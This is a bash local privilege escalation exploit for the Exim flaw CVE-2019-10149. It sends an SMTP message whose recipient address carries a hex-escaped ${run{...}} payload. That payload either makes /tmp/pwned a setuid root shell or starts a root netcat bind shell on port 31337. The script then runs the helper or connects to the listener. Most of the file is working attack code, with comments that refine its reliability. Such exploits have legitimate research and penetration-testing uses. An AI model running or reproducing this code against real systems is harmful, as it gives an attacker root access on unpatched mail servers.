  1. #!/bin/bash
  2.  
  3. #
  4. # raptor_exim_wiz - "The Return of the WIZard" LPE exploit
  5. # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
  6. #
  7. # A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
  8. # Improper validation of recipient address in deliver_message()
  9. # function in /src/deliver.c may lead to remote command execution.
  10. # (CVE-2019-10149)
  11. #
  12. # This is a local privilege escalation exploit for "The Return
  13. # of the WIZard" vulnerability reported by the Qualys Security
  14. # Advisory team.
  15. #
  16. # Credits:
  17. # Qualys Security Advisory team (kudos for your amazing research!)
  18. # Dennis 'dhn' Herrmann (/dev/tcp technique)
  19. #
  20. # Usage (setuid method):
  21. # $ id
  22. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
  23. # $ ./raptor_exim_wiz -m setuid
  24. # Preparing setuid shell helper...
  25. # Delivering setuid payload...
  26. # [...]
  27. # Waiting 5 seconds...
  28. # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
  29. # # id
  30. # uid=0(root) gid=0(root) groups=0(root)
  31. #
  32. # Usage (netcat method):
  33. # $ id
  34. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
  35. # $ ./raptor_exim_wiz -m netcat
  36. # Delivering netcat payload...
  37. # Waiting 5 seconds...
  38. # localhost [127.0.0.1] 31337 (?) open
  39. # id
  40. # uid=0(root) gid=0(root) groups=0(root)
  41. #
# Vulnerable platforms:
# Exim 4.87 - 4.91 (4.92 is not affected)
#
# Prerequisites of this local exploit (all hard-coded below):
# - Exim accepting SMTP on localhost:25 from this host
# - a writable /tmp; the setuid method also wants gcc (it falls back to
#   a setuid copy of /bin/sh if compilation fails) and the netcat method
#   an nc that supports -e
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
  47. #
  48.  
  49. METHOD="setuid" # default method
  50. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
  51. PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
  52.  
  53. # usage instructions
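# usage instructions: print the option summary and exit non-zero.
# Globals:   none
# Arguments: none
# Outputs:   option summary on stderr (diagnostics, not program output)
# Returns:   never returns; exits with status 1
function usage()
{
    printf '%s [-m METHOD]\n\n' "$0" >&2
    printf '%s\n' \
        "-m setuid : use the setuid payload (default)" \
        "-m netcat : use the netcat payload" \
        "" >&2
    exit 1
}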
  63.  
  64. # payload delivery
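# send one SMTP command line on fd 3 and echo the server's reply line.
# Lines go out LF-terminated exactly as before (RFC 5321 wants CRLF, but
# Exim accepts a bare LF by default and this is what was tested against).
# Arguments: $1 - the command line to send
# Returns:   status of reading the reply (non-zero once the peer is gone)
function smtp_send()
{
    printf '%s\n' "$1" >&3
    smtp_reply
}

# read one reply line from fd 3 and print it for the operator.
# Returns:   non-zero if the socket yields no line (closed or reset)
function smtp_reply()
{
    local line
    IFS= read -r -u 3 line && printf '%s\n' "$line"
}

# payload delivery: speak just enough SMTP to the local Exim to queue a
# message whose single recipient is the expansion string in $PAYLOAD.
# Globals:   PAYLOAD (read) - address carrying the ${run{...}} payload
# Arguments: none
# Outputs:   every server reply line on stdout
# Returns:   1 if localhost:25 could not be opened, 0 otherwise (whether
#            Exim actually ran the payload is left to the caller to check)
function exploit()
{
    local i

    # fd 3 is attached to localhost:25 (bash's /dev/tcp) for the whole
    # block and closed again when it ends. If the connect fails the block
    # is skipped and the failure reported, instead of pushing the dialogue
    # into a dead descriptor and printing nothing useful.
    {
        smtp_reply                                  # 220 greeting
        smtp_send "helo localhost"
        smtp_send "mail from:<>"
        smtp_send "rcpt to:<$PAYLOAD>"
        smtp_send "data"
        # 31 Received: headers is one more than Exim's default
        # received_headers_max (30); per the Qualys advisory that is what
        # sends the message down the deliver_message() path in which the
        # recipient address gets expanded, firing ${run{...}}.
        for i in {1..31}; do
            printf 'Received: %s\n' "$i" >&3
        done
        smtp_send "."
        smtp_send "quit"
        :                                           # block status reflects the connect only
    } 3<>/dev/tcp/localhost/25 || {
        echo "Could not connect to localhost:25 - is Exim listening there?" >&2
        return 1
    }
}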
  89.  
  90. # print banner
  91. echo
  92. echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
  93. echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
  94. echo
  95.  
  96. # parse command line
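# parse command line: the only option is "-m METHOD". Anything else, or a
# "-m" with no value behind it, prints usage and exits (usage never returns).
while [ -n "$1" ]; do
    case "$1" in
        -m)
            [ -n "$2" ] || usage
            METHOD="$2"
            shift 2
            ;;
        *)
            usage
            ;;
    esac
done
# METHOD normally carries its default; an empty value can only come from
# "-m ''" and is treated like a missing one.
if [ -z "$METHOD" ]; then
    usage
fi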
  107.  
  108. # setuid method
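# setuid method
if [ "$METHOD" = "setuid" ]; then

    # Prepare a setuid shell helper. /tmp/pwned is the path baked into
    # PAYLOAD_SETUID (Exim, as root, will chown/chmod it), so it cannot be
    # randomised here without changing the payload as well. The helper is
    # compiled straight from stdin so no .c file is left behind in /tmp,
    # and it is a proper C program: the old one-liner relied on implicit
    # int and implicit function declarations, which recent gcc releases
    # reject by default, so it silently took the fallback. setuid(0) and
    # setgid(0) make the real ids root too, so the shell started by
    # system() keeps them.
    echo "Preparing setuid shell helper..."
    if ! printf '%s\n' \
            '#include <stdlib.h>' \
            '#include <unistd.h>' \
            'int main(void) { setuid(0); setgid(0); system("/bin/sh"); return 0; }' \
        | gcc -x c -o /tmp/pwned - 2>/dev/null
    then
        # fallback: a setuid copy of /bin/sh. Fine for dash; bash drops the
        # effective uid unless started with -p, which is why the compiled
        # helper is preferred.
        echo "Problems compiling setuid shell helper, check your gcc."
        echo "Falling back to the /bin/sh method."
        cp /bin/sh /tmp/pwned
    fi
    echo

    # select and deliver the payload; a failed SMTP dialogue means nothing
    # was queued, so there is no point in waiting for it
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_SETUID
    exploit || { echo "Payload delivery failed." >&2; exit 1; }
    echo

    # Exim processes the queued message on its own schedule, so give it a
    # moment, then only run the helper once the setuid bit has actually
    # appeared and the file is no longer ours: running an unprivileged
    # /tmp/pwned would just open a shell as the current user and look
    # like success.
    echo "Waiting 5 seconds..."
    sleep 5
    ls -l /tmp/pwned
    if [ -u /tmp/pwned ] && [ ! -O /tmp/pwned ]; then
        /tmp/pwned
    else
        echo "Exploit failed: /tmp/pwned is not setuid root (target not vulnerable, or the queued delivery has not run yet)." >&2
        exit 1
    fi

# netcat method
elif [ "$METHOD" = "netcat" ]; then

    # The payload runs "nc -lp 31337 -e /bin/sh" as root on this same host,
    # so check up front that an nc is installed at all. Whether it supports
    # -e (the traditional netcat does, the OpenBSD one typically does not)
    # only shows when the connect below succeeds or not.
    if ! command -v nc >/dev/null 2>&1; then
        echo "nc not found in PATH, but the netcat payload needs an nc with -e support." >&2
        exit 1
    fi

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_NETCAT
    exploit || { echo "Payload delivery failed." >&2; exit 1; }
    echo

    # wait for the magic to happen and connect to the root shell listener
    echo "Waiting 5 seconds..."
    sleep 5
    nc -v 127.0.0.1 31337

# print help
else
    usage
fi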